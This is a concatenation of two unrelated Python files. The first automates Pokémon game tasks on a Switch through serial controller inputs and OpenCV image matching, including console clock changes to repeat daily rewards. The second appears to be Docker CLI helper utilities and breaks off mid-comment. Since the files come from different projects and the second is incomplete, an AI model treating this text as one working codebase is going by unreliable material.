PythonCommand.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
from time import sleep
import threading
import Command
import Keys
import cv2
from Keys import Button, Direction, Stick
# Exception used to signal that a stop request was sent from the main window
class StopThread(Exception):
pass
# Python command
class PythonCommand(Command.Command):
def __init__(self, name):
super(PythonCommand, self).__init__(name)
#print('init Python command: ' + name)
self.keys = None
self.thread = None
self.alive = True
self.postProcess = None
@abstractmethod
def do(self):
pass
def do_safe(self, ser):
if self.keys is None:
self.keys = Keys.KeyPress(ser)
try:
if self.alive:
self.do()
self.finish()
except StopThread:
print(self.name + ' has finished successfully.')
except:
if self.keys is None:
self.keys = Keys.KeyPress(ser)
print('interrupted')
import traceback
traceback.print_exc()
self.keys.end()
self.alive = False
def start(self, ser, postProcess=None):
self.alive = True
self.postProcess = postProcess
if not self.thread:
self.thread = threading.Thread(target=self.do_safe, args=(ser,))
self.thread.start()
def end(self, ser):
self.sendStopRequest()
def sendStopRequest(self):
if self.checkIfAlive(): # try if we can stop now
self.alive = False
print(self.name + ': we\'ve sent a stop request.')
# NOTE: Use this function when you want to exit a command loop yourself
def finish(self):
self.alive = False
self.end(self.keys.ser)
# press the given button(s) for `duration` seconds, then wait `wait` seconds
def press(self, buttons, duration=0.1, wait=0.1):
self.keys.input(buttons)
self.wait(duration)
self.keys.inputEnd(buttons)
self.wait(wait)
self.checkIfAlive()
# press the given button(s) `repeat` times, holding each press for `duration` seconds with `interval` seconds between presses
def pressRep(self, buttons, repeat, duration=0.1, interval=0.1, wait=0.1):
for i in range(0, repeat):
self.press(buttons, duration, 0 if i == repeat - 1 else interval)
self.wait(wait)
# start holding the given buttons
def hold(self, buttons):
self.keys.hold(buttons)
# release the held buttons
def holdEnd(self, buttons):
self.keys.holdEnd(buttons)
self.checkIfAlive()
# do nothing for `wait` seconds
def wait(self, wait):
sleep(wait)
self.checkIfAlive()
def checkIfAlive(self):
if not self.alive:
self.keys.end()
self.keys = None
self.thread = None
if self.postProcess is not None:
self.postProcess()
self.postProcess = None
# raise an exception to exit the working thread
raise StopThread('exit successfully')
else:
return True
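# Usage sketch (illustration only; `ser` stands for the serial handle that the
# main window normally creates and passes to start()). The postProcess callback
# registered here runs inside checkIfAlive() once the command stops, which is
# how a GUI could restore its buttons after a run:
#
#     def on_finished():
#         print('command finished')
#
#     cmd = Mash_A('Mash_A')        # any PythonCommand subclass defined below
#     cmd.start(ser, postProcess=on_finished)
#     ...
#     cmd.end(ser)                  # request the command loop to stop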
# Python command using rank match glitch
class RankGlitchPythonCommand(PythonCommand):
def __init__(self, name):
super(RankGlitchPythonCommand, self).__init__(name)
self.day = 0
# Uses the date/time glitch:
# manipulates the system clock to collect the day-change bonus repeatedly without penalties
def timeLeap(self, is_go_back=True):
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # System Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # System Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # Date and Time
self.press(Direction.DOWN, duration=0.7, wait=0.2)
# increment and decrement
if is_go_back:
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2) # Increment a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.2)
self.press(Direction.LEFT, duration=1.5)
self.press(Direction.DOWN, wait=0.2) # Decrement a year
self.press(Direction.RIGHT, duration=1.5)
self.press(Button.A, wait=0.5)
# use increment only, for a faster time leap
else:
self.press(Button.A, wait=0.2)
self.press(Direction.RIGHT)
self.press(Direction.UP, wait=0.2) # increment a day
self.press(Direction.RIGHT, duration=1)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1)
self.press(Button.HOME, wait=1)
TEMPLATE_PATH = "./Template/"
class ImageProcPythonCommand(PythonCommand):
def __init__(self, name, cam):
super(ImageProcPythonCommand, self).__init__(name)
self.camera = cam
# Judge whether the current screenshot contains the given image, using template matching.
# Unless the template's color matters, setting use_gray=True (grayscale matching) is recommended for performance.
def isContainTemplate(self, template_path, threshold=0.7, use_gray=True, show_value=False):
src = self.camera.readFrame()
src = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) if use_gray else src
template = cv2.imread(TEMPLATE_PATH+template_path, cv2.IMREAD_GRAYSCALE if use_gray else cv2.IMREAD_COLOR)
w, h = template.shape[1], template.shape[0]
method = cv2.TM_CCOEFF_NORMED
res = cv2.matchTemplate(src, template, method)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
if show_value:
print(template_path + ' ZNCC value: ' + str(max_val))
if max_val > threshold:
if use_gray:
src = cv2.cvtColor(src, cv2.COLOR_GRAY2BGR)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(src, top_left, bottom_right, (255, 0, 255), 2)
return True
else:
return False
# Get a binarized inter-frame difference image
def getInterframeDiff(self, frame1, frame2, frame3, threshold):
diff1 = cv2.absdiff(frame1, frame2)
diff2 = cv2.absdiff(frame2, frame3)
diff = cv2.bitwise_and(diff1, diff2)
# binarize
img_th = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]
# remove noise
mask = cv2.medianBlur(img_th, 3)
return mask
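# Quick sanity check for getInterframeDiff() (a sketch with synthetic frames;
# assumes numpy is available and `proc` is some ImageProcPythonCommand instance,
# whereas real callers pass cropped camera frames):
#
#     import numpy as np
#     f1 = np.zeros((100, 100), dtype=np.uint8)
#     f2 = f1.copy(); f2[40:60, 40:60] = 255   # something moved in frame 2
#     f3 = f1.copy()
#     mask = proc.getInterframeDiff(f1, f2, f3, 15)
#     cv2.countNonZero(mask)   # ~400: the change shows up in both frame diffs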
# Sync with the console as a controller
class Sync(PythonCommand):
def __init__(self, name):
super(Sync, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.A, 0.1, 2)
self.press(Button.HOME, 0.1, 1)
self.press(Button.A, 0.1, 0.5)
# Unsync the controller
class Unsync(PythonCommand):
def __init__(self, name):
super(Unsync, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.HOME, 0.1, 0.5)
self.press(Direction.DOWN, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Direction.RIGHT, 0.1, 0.1)
self.press(Button.A, 0.1, 1.5)
self.press(Button.A, 0.1, 0.5)
self.press(Button.A, 0.1, 0.3)
# Mash the A button
class Mash_A(PythonCommand):
def __init__(self, name):
super(Mash_A, self).__init__(name)
def do(self):
while True:
self.wait(0.5)
self.press(Button.A)
# Automatic League farming (no image recognition)
class AutoLeague(PythonCommand):
def __init__(self, name):
super(AutoLeague, self).__init__(name)
def do(self):
self.hold(Direction(Stick.LEFT, 70))
while True:
self.wait(0.5)
for _ in range(0, 10):
self.press(Button.A, wait=0.5)
self.press(Button.B)
# Infinite ID lottery (Loto-ID), using the Ranked Battle date glitch
class InfinityLottery(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityLottery, self).__init__(name)
def do(self):
while True:
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Direction.DOWN, wait=0.5)
for _ in range(0, 10): # A loop
self.press(Button.A, wait=0.5)
for _ in range(0, 20): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
# Infinite berry farming, using the Ranked Battle date glitch (image recognition optional)
class InfinityBerry(ImageProcPythonCommand, RankGlitchPythonCommand):
def __init__(self, name, cam):
super(InfinityBerry, self).__init__(name, cam)
self.cam = cam
def do(self):
while True:
# If the camera is not opened, pick one berry and time-leap
if not self.cam.isOpened():
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Button.A, wait=0.5) # yes
for _ in range(0, 15): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
else:
self.press(Button.A, wait=0.5)
self.press(Button.B, wait=0.5)
self.press(Button.A, wait=0.5) # yes
while True:
self.press(Button.A, wait=0.5) # press A to choose 'shake more'
self.press(Button.A, wait=0.5) # just in case
self.press(Button.A, wait=0.5)
while not self.isContainTemplate('fell_message.png'):
self.press(Button.B, wait=0.5)
print('fell message!')
self.press(Button.A, wait=0.5)
# Judge whether to continue, based on the tree-shaking motion
if self.isContinue():
print('continue')
self.wait(0.5)
continue
else:
print('not continue')
break
for _ in range(0, 10): # B loop
self.press(Button.B, wait=0.5)
# Time glitch
self.timeLeap()
def isContinue(self, check_interval=0.1, check_duration=2):
time = 0
zero_cnt = 0
height_half = int(self.camera.capture_size[1] / 2)
frame1 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
sleep(check_interval / 3)
frame2 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
sleep(check_interval / 3)
frame3 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
while time < check_duration:
mask = self.getInterframeDiff(frame1, frame2, frame3, 15)
zero_cnt += cv2.countNonZero(mask)
frame1 = frame2
frame2 = frame3
sleep(check_interval)
frame3 = cv2.cvtColor(self.camera.readFrame()[0:height_half-1, :], cv2.COLOR_BGR2GRAY)
time += check_interval
print('diff cnt: ' + str(zero_cnt))
# the accumulated non-zero pixel count threshold is a heuristic (tuned with in-game weather: sunny)
return zero_cnt < 9000
# Infinite cafe battles, using the Ranked Battle date glitch
class InfinityCafe(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityCafe, self).__init__(name)
self.pp_max = 10
def do(self):
while True:
# battle against the cafe master pp_max times (limited by move PP)
for __ in range(0, self.pp_max):
self.wait(1)
for _ in range(0, 35): # A loop
self.press(Button.A, wait=0.5)
self.wait(5)
for _ in range(0, 45): # B loop
self.press(Button.B, wait=0.5)
self.timeLeap()
# go to pokemon center to restore PP
self.press(Direction.DOWN, duration=3.5)
self.press(Button.X, wait=1)
self.press(Button.A, wait=3) # open up a map
self.press(Button.A, wait=1)
self.press(Button.A, wait=4)
self.press(Direction.UP, duration=0.2)
self.press(Direction.UP_LEFT, duration=1, wait=2)
# in pokemon center
self.press(Direction.UP, duration=2)
for _ in range(0, 10): # A loop
self.press(Button.A, wait=0.5)
for _ in range(0, 15): # B loop
self.press(Button.B, wait=0.5)
self.press(Direction.DOWN, duration=2, wait=2)
# move to cafe in Wyndon (Shoot City)
self.press(Direction.LEFT, duration=3)
self.press(Direction.UP, duration=4)
self.press(Direction.RIGHT, duration=1 ,wait=2)
self.press(Direction.UP, duration=2, wait=1)
# Automatically release pokemons from the box
class AutoRelease(ImageProcPythonCommand):
def __init__(self, name, cam):
super(AutoRelease, self).__init__(name, cam)
self.row = 5
self.col = 6
self.cam = cam
def do(self):
self.wait(0.5)
for i in range(0, self.row):
for j in range(0, self.col):
if not self.cam.isOpened():
self.Release()
else:
# if shiny, then skip
if not self.isContainTemplate('shiny_mark.png', threshold=0.9):
if self.isContainTemplate('status.png', threshold=0.7): # Maybe this threshold works for only Japanese version.
# Release a pokemon
self.Release()
if not j == self.col - 1:
if i % 2 == 0: self.press(Direction.RIGHT, wait=0.2)
else: self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
# Return from pokemon box
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Button.B, wait=1.5)
def Release(self):
self.press(Button.A, wait=0.5)
self.press(Direction.UP, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1.5)
self.press(Button.A, wait=0.3)
# Hatch eggs a fixed number of times (requires a capture device)
class CountHatching(ImageProcPythonCommand):
def __init__(self, name, cam):
super(CountHatching, self).__init__(name, cam)
self.hatched_num = 0
self.count = 5
self.place = 'wild_area'
def do(self):
while self.hatched_num < self.count:
if self.hatched_num == 0:
self.press(Direction.RIGHT, duration=1)
self.hold([Direction.RIGHT, Direction.R_LEFT])
# turn round and round
while not self.isContainTemplate('egg_notice.png'):
self.wait(1)
print('egg hatching')
self.holdEnd([Direction.RIGHT, Direction.R_LEFT])
self.press(Button.A)
self.wait(15)
for i in range(0, 5):
self.press(Button.A, wait=1)
self.hatched_num += 1
print('hatched_num: ' + str(self.hatched_num))
# Automatic egg hatching using image recognition (requires a capture device)
class AutoHatching(ImageProcPythonCommand):
def __init__(self, name, cam):
super(AutoHatching, self).__init__(name, cam)
self.cam = cam
self.party_num = 1 # don't count eggs
self.hatched_num = 0
self.hatched_box_num = 0
self.itr_max = 6
def do(self):
self.press(Direction.DOWN, duration=0.05, wait=1)
self.press(Direction.DOWN, duration=0.8)
self.press(Direction.LEFT, duration=0.2)
while True:
for i in range(0, self.itr_max):
print('iteration: ' + str(i+1) + ' (' + str(i*5) + '/30) -> (' + str((i+1)*5) + '/30)')
print('hatched box num : ' + str(self.hatched_box_num))
self.getNewEgg()
self.press(Direction.UP, duration=0.05, wait=0.5)
self.press(Direction.UP, duration=1)
# hatch eggs
while self.party_num < 6:
self.press(Direction.RIGHT, duration=1)
self.hold([Direction.RIGHT, Direction.R_LEFT])
# turn round and round
while not self.isContainTemplate('egg_notice.png'):
self.wait(1)
print('egg hatching')
self.holdEnd([Direction.RIGHT, Direction.R_LEFT])
self.press(Button.A)
self.wait(15)
for j in range(0, 5):
self.press(Button.A, wait=1)
self.hatched_num += 1
self.party_num += 1
print('party_num: ' + str(self.party_num))
print('all hatched num: ' + str(self.hatched_num))
self.press(Button.X, wait=1)
self.press(Button.A, wait=3) # open up a map
self.press(Button.A, wait=1)
self.press(Button.A, wait=4)
self.press(Direction.DOWN, duration=0.05, wait=0.5)
self.press(Direction.DOWN, duration=0.8)
self.press(Direction.LEFT, duration=0.2)
if self.party_num < 6:
# get a new egg
self.getNewEgg()
self.press(Direction.UP, duration=0.05, wait=0.5)
self.press(Direction.UP, duration=1)
# open up pokemon box
self.press(Button.X, wait=1)
self.press(Direction.RIGHT, wait=0.5) # set cursor to party
self.press(Button.A, wait=2)
self.press(Button.R, wait=2)
self.putPokemonsToBox(start=1, num=5)
self.party_num = 1
if i < self.itr_max - 1:
self.press(Button.B, wait=0.5)
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Direction.LEFT, wait=0.2) # set cursor to map
self.press(Button.B, wait=1.5)
self.hatched_box_num += 1
# release
self.press(Button.B, wait=0.8)
self.press(Button.Y, wait=0.2)
self.press(Direction.DOWN, wait=0.3)
self.press(Direction.DOWN, wait=0.3)
# For now, stop if a shiny is in the box
is_contain_shiny = self.ReleaseBox()
if is_contain_shiny:
print('shiny!')
break
self.press(Button.B, wait=0.5)
self.press(Button.B, wait=2)
self.press(Button.B, wait=2)
self.press(Direction.LEFT, wait=0.2) # set cursor to map
self.press(Button.B, wait=1.5)
def getNewEgg(self):
self.press(Button.A, wait=0.5)
if not self.isContainTemplate('egg_found.png'):
print('egg not found')
self.finish() # TODO
print('egg found')
self.press(Button.A, wait=1)
self.press(Button.A, wait=1)
self.press(Button.A, wait=3)
self.press(Button.A, wait=2)
self.press(Button.A, wait=2)
self.press(Button.A, wait=1)
def putPokemonsToBox(self, start=0, num=1):
self.press(Direction.LEFT, wait=0.3)
self.pressRep(Direction.DOWN, start, wait=0.3)
# select by range
self.press(Button.Y, wait=0.2)
self.press(Button.Y, wait=0.2)
self.press(Button.A, wait=0.2)
self.pressRep(Direction.DOWN, num-1)
self.press(Button.A, wait=0.2)
# put to box
self.pressRep(Direction.UP, 3)
self.press(Direction.RIGHT, wait=0.2)
self.press(Button.A, wait=0.5)
self.press(Button.A, wait=0.5)
def ReleaseBox(self):
row = 5
col = 6
for i in range(0, row):
for j in range(0, col):
# if shiny, then stop
if self.isContainTemplate('shiny_mark.png', threshold=0.9):
return True
# Maybe this threshold works for only Japanese version.
if self.isContainTemplate('status.png', threshold=0.7):
# Release a pokemon
self.Release()
if not j == col - 1:
if i % 2 == 0: self.press(Direction.RIGHT, wait=0.2)
else: self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
return False
def Release(self):
self.press(Button.A, wait=0.5)
self.press(Direction.UP, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1)
self.press(Direction.UP, wait=0.2)
self.press(Button.A, wait=1.5)
self.press(Button.A, wait=0.3)
# for debug
class Debug(ImageProcPythonCommand):
def __init__(self, name, cam):
super(Debug, self).__init__(name, cam)
def do(self):
self.goRound()
def goRound(self):
self.press(Direction.LEFT, duration=0.5)
self.press(Direction.DOWN_LEFT, duration=0.5)
self.press(Direction.DOWN, duration=0.5)
self.press(Direction.DOWN_RIGHT, duration=0.5)
self.press(Direction.RIGHT, duration=0.5)
self.press(Direction.UP_RIGHT, duration=0.5)
self.press(Direction.UP, duration=0.5)
self.press(Direction.UP_LEFT, duration=0.5)
# Collect Watts automatically using the date glitch
# source: MCU Command 'InifinityWatt'
class InfinityWatt(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityWatt, self).__init__(name)
self.use_rank = True
def do(self):
while True:
self.wait(1)
if self.use_rank:
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=4.1)
else:
self.press(Button.A, wait=1)
self.press(Button.A, wait=3) # start the raid
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # select Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN, wait=0.3)
self.press(Button.A, wait=0.2) # select Date and Time
self.press(Button.A, wait=0.4)
self.press(Direction.DOWN, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
self.press(Button.A, wait=0.2)
self.press(Direction.UP, wait=0.2)
self.press(Direction.RIGHT, duration=1, wait=0.3)
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1) # return to the game
self.press(Button.HOME, wait=2)
self.press(Button.B, wait=1)
self.press(Button.A, wait=6) # quit the raid
self.press(Button.A, wait=1)
self.press(Button.A, wait=1) # 2000W
self.press(Button.A, wait=1.8)
self.press(Button.B, wait=1.5)
self.press(Button.HOME, wait=1)
self.press(Direction.DOWN)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Direction.RIGHT)
self.press(Button.A, wait=1.5) # select Settings
self.press(Direction.DOWN, duration=2, wait=0.5)
self.press(Button.A, wait=0.3) # Settings > System
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Direction.DOWN)
self.press(Button.A) # select Date and Time
self.press(Button.A, wait=0.5)
self.press(Button.HOME, wait=1) # return to the game
self.press(Button.HOME, wait=1)
class InfinityFeather(RankGlitchPythonCommand):
def __init__(self, name):
super(InfinityFeather, self).__init__(name)
def do(self):
# For timing measurements; add "import time" when enabling the lines below
# start = time.time()
# i = 0 # loop counter
print('Start collecting feathers')
while True:
self.wait(0.75)
# i += 1
# print('Map')
self.press(Button.X, wait=1.5) # open up a map
self.press(Button.A, wait=3.0)
self.press(Direction(Stick.LEFT, 45), duration=0.05) # Select a Pokémon Day Care
self.press(Button.A, wait=1)
self.press(Button.A, wait=4.0)
# print('pick feather')
self.press(Direction.DOWN_RIGHT, duration=0.15)
self.press(Direction.RIGHT, duration=3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
self.press(Button.A, wait=0.3)
# print('Time leap')
self.timeLeap()
# tm = round(time.time() - start, 2)
# print('Loop : {} in {} sec. Average: {} sec/loop'.format(i, tm, round(tm / i, 2)))
class Fossil_shiny(ImageProcPythonCommand):
def __init__(self, name, cam):
super(Fossil_shiny, self).__init__(name, cam)
'''
head = {0 : "カセキのトリ (Fossilized Bird)", 1 : "カセキのサカナ (Fossilized Fish)"}
body = {0 : "カセキのリュウ (Fossilized Drake)", 1 : "カセキのクビナガ (Fossilized Dino)"}
'''
def fossil_loop(self, head=0, body=0):
# start = time.time()
i = 0
while True:
for j in range(30):
print('fossil #{} ({}/30 of a box)'.format(30*i+j+1, j+1))
self.press(Button.A, wait=0.75)
self.press(Button.A, wait=0.75)
if head == 1:
self.press(Direction.DOWN, duration=0.07, wait=0.75) # select fossil
self.press(Button.A, wait=0.75) # determine fossil
if body == 1:
self.press(Direction.DOWN, duration=0.07, wait=0.75) # select fossil
self.press(Button.A, wait=0.75) # determine fossil
self.press(Button.A, wait=0.75) # confirm the selection ("それでよければ")
while not self.isContainTemplate('Network_Offline.png', 0.8):
self.press(Button.B, wait=0.5)
self.wait(1.0)
# open up pokemon box
self.press(Button.X, wait=1)
self.press(Direction.RIGHT, duration=0.07, wait=1)
self.press(Button.A, wait=2)
self.press(Button.R, wait=2)
is_contain_shiny = self.CheckBox()
# tm = round(time.time() - start, 2)
# print('Loop : {} in {} sec. Average: {} sec/loop'.format(i, tm, round(tm / i, 2)))
if is_contain_shiny:
print('Shiny!')
break
self.press(Button.HOME, wait=2) # EXIT Game
self.press(Button.X, wait=0.6)
self.press(Button.A, wait=2.5) # closed
self.press(Button.A, wait=2.0) # Choose game
self.press(Button.A) # User selection
while not self.isContainTemplate('OP.png', 0.7): # recognize Opening
self.wait(0.2)
self.press(Button.A) # load save-data
while not self.isContainTemplate('Network_Offline.png', 0.8):
self.wait(0.5)
self.wait(1.0)
i += 1
def CheckBox(self):
row = 5
col = 6
for i in range(0, row):
for j in range(0, col):
# if shiny, then stop
if self.isContainTemplate('shiny_mark.png', threshold=0.9):
return True
# Maybe this threshold works for only Japanese version.
if self.isContainTemplate('status.png', threshold=0.7):
pass
if not j == col - 1:
if i % 2 == 0:
self.press(Direction.RIGHT, wait=0.2)
else:
self.press(Direction.LEFT, wait=0.2)
self.press(Direction.DOWN, wait=0.2)
return False
class Fossil_shiny_00(Fossil_shiny): # パッチラゴン (Dracozolt)
def __init__(self, name, cam):
super(Fossil_shiny_00, self).__init__(name, cam)
def do(self):
self.fossil_loop(0, 0)
class Fossil_shiny_01(Fossil_shiny): # パッチルドン (Arctozolt)
def __init__(self, name, cam):
super(Fossil_shiny_01, self).__init__(name, cam)
def do(self):
self.fossil_loop(0, 1)
class Fossil_shiny_10(Fossil_shiny): # ウオノラゴン (Dracovish)
def __init__(self, name, cam):
super(Fossil_shiny_10, self).__init__(name, cam)
def do(self):
self.fossil_loop(1, 0)
class Fossil_shiny_11(Fossil_shiny): # ウオチルドン (Arctovish)
def __init__(self, name, cam):
super(Fossil_shiny_11, self).__init__(name, cam)
def do(self):
self.fossil_loop(1, 1)
# Sample skeleton command
# Copy and paste this class and write your code in the do() method.
# After writing the code, don't forget to add the class to the commands dictionary below.
class Sample(PythonCommand):
def __init__(self, name):
super(Sample, self).__init__(name)
def do(self):
self.wait(1)
# Perform the Day skip glitch once
class AdvanceFrame(RankGlitchPythonCommand):
def __init__(self, name):
super(AdvanceFrame, self).__init__(name)
self.use_rank = True
def do(self):
if self.checkIfAlive():
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=5)
self.finish()
# Perform the Day skip glitch three times
class AdvanceFrameThree(RankGlitchPythonCommand):
def __init__(self, name):
super(AdvanceFrameThree, self).__init__(name)
self.use_rank = True
def do(self):
for _ in range(3):
self.wait(1)
if self.checkIfAlive():
self.press(Button.A, duration=0.4, wait=0.1)
self.press(Button.A, duration=0.4, wait=0.1) # 2000W
self.press(Button.A, wait=1)
self.press(Button.A, duration=0.1, wait=2.5)
self.press(Button.B, duration=0.3, wait=0.5)
self.timeLeap(False)
self.press(Button.A, wait=5)
else:
break
self.finish()
# reset the game
class Reset(PythonCommand):
def __init__(self, name):
super(Reset, self).__init__(name)
def do(self):
self.wait(1)
self.press(Button.HOME, wait=1)
self.press(Button.X, wait=1)
self.press(Button.A, wait=5)
self.press(Button.A, wait=2)
self.press(Button.A, wait=18)
self.press(Button.A, wait=1)
self.finish()
# Add the commands you want to use here
commands = {
'Mash_A - A連打': Mash_A,
'AutoLeague - 自動リーグ周回': AutoLeague,
'AutoHatching - 仮:自動孵化(画像認識)': AutoHatching,
'CountHatching - 固定数孵化(画像認識)': CountHatching,
'AutoRelease - 自動リリース': AutoRelease,
'InfinityWatt - 無限ワット(ランクマ)': InfinityWatt,
'InfinityLottery - 無限IDくじ(ランクマ)': InfinityLottery,
'InfinityBerry - 無限きのみ(ランクマ)': InfinityBerry,
'InfinityCafe - 無限カフェ(ランクマ)': InfinityCafe,
'??? - 無限羽回収(ランクマ)': InfinityFeather,
'Shiny Fossil 00 - カセキ色厳選(パッチラゴン)': Fossil_shiny_00,
'Shiny Fossil 01 - カセキ色厳選(パッチルドン)': Fossil_shiny_01,
'Shiny Fossil 10 - カセキ色厳選(ウオノラゴン)': Fossil_shiny_10,
'Shiny Fossil 11 - カセキ色厳選(ウオチルドン)': Fossil_shiny_11,
'Debug - デバグ': Debug,
'Advance Frame - Seed Search': AdvanceFrame,
'Advance Frame By 3 - Seed Search': AdvanceFrameThree,
'Reset': Reset,
}
# Add the commands you want to expose as utilities here
utils = {
'Sync - コントローラ同期': Sync,
'Unsync - コントローラ同期解除': Unsync,
}
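# Registration sketch (illustration only): after defining a new PythonCommand
# subclass (see the Sample class above), expose it by adding an entry, e.g.
#     commands['MyCommand - my label'] = MyCommand   # hypothetical class/label
# Image-recognition commands take (name, cam) and must subclass
# ImageProcPythonCommand, as the entries above do.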
|
utils.py
|
import os
import subprocess
from pathlib import Path
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import pydantic
PROJECT_ROOT = Path(__file__).parents[1]
def title_if_necessary(string: str):
if string.isupper():
return string
else:
return string.title()
def to_docker_camel(string):
try:
special_cases = {
"exec_ids": "ExecIDs",
"sandbox_id": "SandboxID",
"oom_killed": "OOMKilled",
"rw": "RW",
"link_local_ipv6_address": "LinkLocalIPv6Address",
"link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen",
"secondary_ipv6_addresses": "SecondaryIPv6Addresses",
"endpoint_id": "EndpointID",
"global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen",
"ip_adress": "IPAddress",
"ip_prefix_lenght": "IPPrefixLen",
"ipv6_gateway": "IPv6Gateway",
"network_id": "NetworkID",
"ip_address": "IPAddress",
"global_ipv6_address": "GlobalIPv6Address",
"blkio_device_read_iops": "BlkioDeviceReadIOps",
"blkio_device_write_iops": "BlkioDeviceWriteIOps",
"device_ids": "DeviceIDs",
"kernel_memory_tcp": "KernelMemoryTCP",
"container_id_file": "ContainerIDFile",
"uts_mode": "UTSMode",
"root_fs": "RootFS",
"enable_ipv6": "EnableIPv6",
"ipv4_address": "IPv4Address",
"ipv6_address": "IPv6Address",
"ipam": "IPAM",
"tls_info": "TLSInfo",
"virtual_ips": "VirtualIPs",
}
return special_cases[string]
except KeyError:
return "".join(title_if_necessary(x) for x in string.split("_"))
class DockerCamelModel(pydantic.BaseModel):
class Config:
alias_generator = to_docker_camel
allow_population_by_field_name = True
class DockerException(Exception):
def __init__(
self,
command_launched: List[str],
return_code: int,
stdout: Optional[bytes] = None,
stderr: Optional[bytes] = None,
):
command_launched_str = " ".join(command_launched)
error_msg = (
f"The docker command executed was `{command_launched_str}`.\n"
f"It returned with code {return_code}\n"
)
if stdout is not None:
error_msg += f"The content of stdout is '{stdout.decode()}'\n"
else:
error_msg += (
"The content of stdout can be found above the "
"stacktrace (it wasn't captured).\n"
)
if stderr is not None:
error_msg += f"The content of stderr is '{stderr.decode()}'\n"
else:
error_msg += (
"The content of stderr can be found above the "
"stacktrace (it wasn't captured)."
)
super().__init__(error_msg)
def run(
args: List[Any],
capture_stdout: bool = True,
capture_stderr: bool = True,
input: bytes = None,
return_stderr: bool = False,
env: Dict[str, str] = {},
) -> Union[str, Tuple[str, str]]:
args = [str(x) for x in args]
subprocess_env = dict(os.environ)
subprocess_env.update(env)
if args[1] == "buildx":
subprocess_env["DOCKER_CLI_EXPERIMENTAL"] = "enabled"
if capture_stdout:
stdout_dest = subprocess.PIPE
else:
stdout_dest = None
if capture_stderr:
stderr_dest = subprocess.PIPE
else:
stderr_dest = None
if os.environ.get("PYTHON_ON_WHALES_DEBUG", "0") == "1":
print("------------------------------")
print("command: " + " ".join(args))
print(f"Env: {subprocess_env}")
print("------------------------------")
completed_process = subprocess.run(
args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=subprocess_env
)
if completed_process.returncode != 0:
raise DockerException(
args,
completed_process.returncode,
completed_process.stdout,
completed_process.stderr,
)
if return_stderr:
return (
post_process_stream(completed_process.stdout),
post_process_stream(completed_process.stderr),
)
else:
return post_process_stream(completed_process.stdout)
def post_process_stream(stream: Optional[bytes]):
if stream is None:
return ""
stream = stream.decode()
if len(stream) != 0 and stream[-1] == "\n":
stream = stream[:-1]
return stream
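# Usage sketch for run() (assumes the docker CLI is installed; the return value
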